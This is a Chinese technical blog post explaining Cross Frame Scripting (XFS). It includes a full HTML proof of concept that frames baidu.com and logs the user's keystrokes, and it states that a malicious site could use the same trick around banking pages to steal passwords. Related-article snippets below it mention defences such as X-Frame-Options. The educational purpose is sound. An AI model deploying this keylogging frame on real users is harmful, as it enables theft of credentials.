Cross Frame Script (跨框架脚本) 攻击

最新推荐文章于 2022-01-27 18:10:38 发布
最新推荐文章于 2022-01-27 18:10:38 发布
阅读量6.8k 收藏
点赞数
分类专栏: 脚本网页语言安全和网站攻防 文章标签: 框架 脚本 scripting html 浏览器 function

什么是Cross Frame Script?

很简单,做个实验就知道了。把下面的这段HTML代码另存为一个html文件,然后用ie浏览器打开。

<html>
<head>
<title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () { 
   k = window.event.keyCode; 
   window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
<frameset οnlοad="this.focus();" οnblur="this.focus();" cols="100%">
 <frame src="http://www.baidu.com/" scrolling="auto">
</frameset>
</html>

当你在百度的搜索框输入字符时,你会发现左下角的状态栏上出现了你输入的字符。

Cross Frame Script 原理

利用浏览器允许框架(frame)跨站包含其它页面的漏洞,在主框架的代码中加入scirpt,监视、盗取用户输入。

Cross Frame Script 危害

一个恶意的站点可以通过用框架包含真的网银或在线支付网站,获取用户账号和密码。

更详细的资料参考,http://www.xs4all.nl/~ppk/js/crosfram.html  

iiprogram
关注
专栏目录
XFS框架脚本漏洞介绍
发哥微课堂
09-18 1086
※ 介绍※ XFS即Cross-FrameScripting框架脚本,也叫iFrame注入,了解XFS问题前先来看下面这个小例子,有如下一段html代码。 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title></title> <script&g...
.NET框架脚本(XFS)漏洞解决方案
Teemo_2016的博客
07-23 1204
框架脚本(XFS)漏洞使攻击者能够在恶意页面的 HTML iframe 标记内加载易受攻击的应用程序。攻击者可以使用此漏洞设计点击劫持攻击,以实施钓鱼式攻击框架探查攻击、社会工程攻击站点请求伪造攻击。 点击劫持攻击的目的是欺骗受害用户在不了解的目标网站上与攻击者选择的 UI 元素交互,然后反过来代表受害者执行特权功能。为达到这一目的,攻击者必须攻击 XFS 漏洞以在 iframe 标记内...
Cross Frame Script 框架脚本 攻击
qq_43746825的博客
02-22 505
Cross Frame Script 框架脚本 攻击
【常见Web应用安全问题】---6、Script source code disclosure
weixin_34128839的博客
12-22 408
Web应用程序的安全性问题依其存在的形势划分,种类繁多,这里不准备介绍所有的,只介绍常见的一些。  常见Web应用安全问题安全性问题的列表:   1、脚本攻击(CSS or XSS, Cross Site Scripting)   2、SQL注入攻击(SQL injection)   3、远程命令执行(Code execution,个人觉得译成代码执行并不确...
Cross Frame Scripting
huzk4409的专栏
08-07 1928
有時白箱工具會掃出Client Cross Frame Scripting Attack , 可以在 Header 中加入設定X-FRAME-OPTIONS 但是這樣有些 白箱工具並不知道, 客戶還是會要你改到 Report 看不到, 那怎麼辦呢? 這時候一般會在js中加入 if (top != self) {top.location = self.location;} ...
XFS: Cross Frame Script (框架脚本) 攻击
weixin_33736048的博客
01-09 1029
一、Cross Frame Script (框架脚本) 攻击什么是Cross Frame Script?很简单,做个实验就知道了。把下面的这段HTML代码另存为一个html文件,然后用ie浏览器打开。&lt;html&gt;&lt;head&gt;&lt;title&gt;IE Cross Frame Scripting Restriction Bypass Example&lt;/title&...
jQuery - 参考资料 - About Cross-Frame Scripting and Security:关于框架脚本和安全
胡争辉
11-06 2110
jQuery - 参考资料 - About Cross-Frame Scripting and Security:关于框架脚本和安全 [About Cross-Frame Scripting and Security: - 文档] http://msdn2.microsoft.com/en-us/library/ms533028.aspx [jQuery -
JS的33个概念—前端安全(脚本攻击XSS和站请求伪造CSRF)
jiaojsun的博客
07-26 1177
1.脚本攻击(XSS) 1)定义 脚本攻击是基于web应用中已知的漏洞,服务端,或者依赖的插件系统。利用其中一种方式,攻击者可以把恶意内容放进目标站点传输的内容中。当这种结合的内容到达客户端的浏览器中,它就已经变成从受信任的来源传输的,然后在系统授权下进行操作。通过寻找把恶意脚本注入web页面的方法,攻击者可以获取对敏感页面的访问权限,例如对session cookie和浏览器代表用...
Web应用安全:脚本攻击(XSS)的原理与防护
# 1. 引言 ## 1.1 什么是Web应用安全 ...XSS(Cross-Site Scripting攻击是一种常见的Web应用安全漏洞,也是最为危险的攻击之一。当Web应用被XSS攻击成功后,黑客可以插入恶意脚本代码到Web页面中,
Cross-Frame Scripting漏洞解决---当你这个漏洞解决不了时,不妨看一下
better1166的博客
09-15 1737
使用HP webInspect进行漏洞扫描时,总是出现Cross-Frame Scripting这个漏洞,经过一次次的扫描测试,终于发现解决办法: (1)漏洞扫描报告关于设置X-FRAME-OPTIONS的方法,由于自己用的不是正式的webInspect版本,即使不设置这个,后台扫描时也不会出现这个漏洞,个人觉得这个方法并不是针对所有的扫描设备都管用,但是遇到的时候测试一下,说不定就好了呢; (2)在页面初始化时加上 if(top != self) { ...
域 iframe 实例 (Cross-Domain Javascript execution library)
03-31
NULL 博文链接:https://justcoding.iteye.com/blog/1374728
Cross Frame 与不同域进行交互
03-28
NULL 博文链接:https://mllongze.iteye.com/blog/1234987
web安全技术
01-31
在這樣的網站設計與架設的概念下,如果該網站之 網頁存取權限或實體的資料夾檔案權限控管不當, 攻擊者只要猜測或使用工具取得該網站內資料夾或 檔案文件名稱,便可從Internet下載存放於該網站 (資料夾)內本屬不應公開的文件或資料庫。
Cross-Frame Scripting 漏洞解决
CutelittleBo的博客
01-24 1070
设置 nginx 添加以下指令到 http, server 或 location 中 add_header X-Frame-Options SAMEORIGIN; 参考:https://developer.mozilla.org/zh-TW/docs/Web/HTTP/Headers/X-Frame-Options
frame脚本和安全问题
SilentAcorn的专栏
11-13 984
仅作一下翻译,原文: About Cross-Frame Scripting and Security 在DHTML中,不同的窗口和框架(frames)中的内容可以通过对象模式用脚本相互交互。但是,由于可以在一个浏览器中通过多个窗口和框架同时显示多个毫不相干的内容,因此制定一定的限制性规则用于确保数据的真实性和保护个人隐私信息就显得很有必要的。 这片文章描述了为什么要添加这些限制性规则,以及这些规
漏洞修复:Cross-Frame Scripting Medium
CutelittleBo的博客
01-27 967
描述: A Cross-Frame Scripting (XFS) vulnerability can allow an attacker to load the vulnerable application inside an HTML iframe tag on a malicious page. The attacker could use this weakness to devise a Clickjacking attack to conduct phishing, frame sniffing
网站脚本(Cross-site scripting)介绍
后端开发
05-27 1602
网站脚本(Cross-site scripting,通常简称为XSS或脚本脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值